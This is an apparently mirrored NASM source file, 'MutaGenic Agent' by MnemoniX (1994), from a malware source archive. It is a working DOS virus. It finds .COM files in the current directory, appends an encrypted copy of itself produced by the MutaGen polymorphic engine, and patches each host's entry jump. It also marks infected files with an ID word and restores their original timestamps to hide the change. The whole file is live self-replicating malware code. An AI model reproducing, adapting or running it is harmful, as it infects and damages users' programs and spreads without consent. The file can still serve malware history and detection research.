mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
175 lines
5.0 KiB
NASM
175 lines
5.0 KiB
NASM
|
; MutaGenic Agent - MutaGen Test Virus
|
||
|
; by MnemoniX 1994
|
||
|
;
|
||
|
; This is an ordinary run-of-the-mill virus that infects a .COM file in
|
||
|
; the current directory on run and uses MutaGen to encrypt itself.
|
||
|
|
||
|
MGEN_SIZE equ 1032 ; size of MutaGen
|
||
|
|
||
|
ID equ 'MG' ; ID word
|
||
|
MAX_INFECTIONS equ 2 ; infections per run
|
||
|
|
||
|
extrn _MUTAGEN:near ; call MutaGen
|
||
|
|
||
|
code segment byte public 'code'
|
||
|
org 100h
|
||
|
assume cs:code,ds:code,es:code,ss:code
|
||
|
|
||
|
start:
|
||
|
db 0E9h,03h,00h ; jmp virus_begin
|
||
|
dw ID
|
||
|
|
||
|
host:
|
||
|
db 0CDh,020h,00
|
||
|
|
||
|
virus_begin:
|
||
|
call $+3 ; BP serves as pointer
|
||
|
pop bp
|
||
|
sub bp,offset $-1
|
||
|
|
||
|
mov byte ptr [bp+offset infect],0 ; clear infection flag
|
||
|
|
||
|
mov ah,2Fh ; get original DTA address
|
||
|
int 21h ; and save it
|
||
|
push bx
|
||
|
|
||
|
lea dx,[bp+END_MGEN] ; set our DTA to the end of the
|
||
|
mov ah,1Ah ; virus code
|
||
|
int 21h
|
||
|
|
||
|
call infect_search ; infection routine ...
|
||
|
|
||
|
pop dx ; ... and we're done
|
||
|
mov ah,1Ah
|
||
|
int 21h
|
||
|
|
||
|
mov di,100h ; enter in original five bytes of host
|
||
|
push di ; save DI as host address
|
||
|
lea si,[bp+offset prog_len] ; get address of original host header
|
||
|
mov si,[si] ; found at end of host program
|
||
|
add si,100h
|
||
|
movsb ; move five bytes
|
||
|
movsw
|
||
|
movsw
|
||
|
|
||
|
ret ; and call host
|
||
|
|
||
|
infect_search proc near
|
||
|
|
||
|
mov ah,4Eh ; search for first .COM file
|
||
|
lea dx,[bp+com_file] ; in directory
|
||
|
xor cx,cx
|
||
|
int 21h
|
||
|
jnc infect_file ; none present, leave
|
||
|
jmp inf_complete
|
||
|
|
||
|
infect_file:
|
||
|
mov ax,3D02h ; .COM file found, open
|
||
|
lea dx,[bp+END_MGEN+1Eh]
|
||
|
int 21h
|
||
|
|
||
|
mov bx,ax ; file handle in BX
|
||
|
mov ax,5700h ; get file date and time
|
||
|
int 21h ; and save it
|
||
|
push cx
|
||
|
push dx
|
||
|
|
||
|
lea dx,[bp+orig_header] ; now read in first five bytes
|
||
|
mov cx,5 ; of the file
|
||
|
mov ah,3Fh
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4202h ; no, infect this file
|
||
|
call move_pointer ; (this call is to save bytes)
|
||
|
|
||
|
cmp ax,64000
|
||
|
jae infected ; file is too big, skip it
|
||
|
cmp [bp+offset orig_header+3],ID
|
||
|
je infected ; if previously infected, skip it
|
||
|
|
||
|
lea si,[bp+offset new_jump+1]
|
||
|
|
||
|
push [bp+offset prog_len] ; save original program length
|
||
|
mov [bp+offset prog_len],ax ; store this program length
|
||
|
|
||
|
add ax,2
|
||
|
mov [si],ax
|
||
|
|
||
|
lea dx,[bp+offset orig_header] ; store first five bytes of file
|
||
|
mov cx,5 ; at end of file
|
||
|
mov ah,40h
|
||
|
int 21h
|
||
|
|
||
|
; MutaGen calling routine
|
||
|
push bx
|
||
|
push bp
|
||
|
mov dx,[si] ; MutaGen offset calculation
|
||
|
add dx,103h
|
||
|
mov cx,VIRUS_SIZE ; write VIRUS_SIZE bytes
|
||
|
lea di,[bp+END_MGEN+80h] ; store at end of virus
|
||
|
lea si,[bp+offset virus_begin]
|
||
|
call _MUTAGEN
|
||
|
|
||
|
pop bp
|
||
|
pop bx
|
||
|
lea dx,[bp+offset END_MGEN+80h] ; write encrypted code
|
||
|
mov ah,40h ; to file
|
||
|
int 21h
|
||
|
|
||
|
pop [bp+offset prog_len] ; restore original program length
|
||
|
|
||
|
mov ax,4200h ; lastly, add our new jump instruction
|
||
|
call move_pointer ; to the beginning of the file
|
||
|
|
||
|
lea dx,[bp+offset new_jump]
|
||
|
mov cx,5 ; write five bytes to file
|
||
|
mov ah,40h
|
||
|
int 21h
|
||
|
|
||
|
inc byte ptr [bp+offset infect] ; set infection flag
|
||
|
|
||
|
infected:
|
||
|
pop dx ; restore time and date
|
||
|
pop cx
|
||
|
mov ax,5701h
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3Eh ; close file
|
||
|
int 21h
|
||
|
|
||
|
cmp byte ptr [bp+offset infect],1 ; did an infection occur?
|
||
|
je inf_complete ; yes, go
|
||
|
|
||
|
mov ah,4Fh ; find another file
|
||
|
int 21h ; and repeat
|
||
|
jc inf_complete ; none found, quit
|
||
|
jmp infect_file
|
||
|
inf_complete:
|
||
|
ret
|
||
|
|
||
|
|
||
|
move_pointer:
|
||
|
xor cx,cx ; i'm being really stingy with space
|
||
|
xor dx,dx ; here ...
|
||
|
int 21h
|
||
|
ret
|
||
|
|
||
|
endp
|
||
|
|
||
|
com_file db '*.COM',0 ; .COM file
|
||
|
orig_header db 5 dup(0) ; first three bytes of program
|
||
|
new_jump db 0E9h,00,00 ; new jump instruction
|
||
|
dw ID ; ID signature
|
||
|
prog_len dw 3 ; length of file for return sequence
|
||
|
infect db 0
|
||
|
sig db '[MutaGenic Agent]',0
|
||
|
|
||
|
virus_end:
|
||
|
|
||
|
END_MGEN equ virus_end + MGEN_SIZE
|
||
|
VIRUS_SIZE equ virus_end - virus_begin + MGEN_SIZE
|
||
|
|
||
|
code ends
|
||
|
end start
|
||
|
|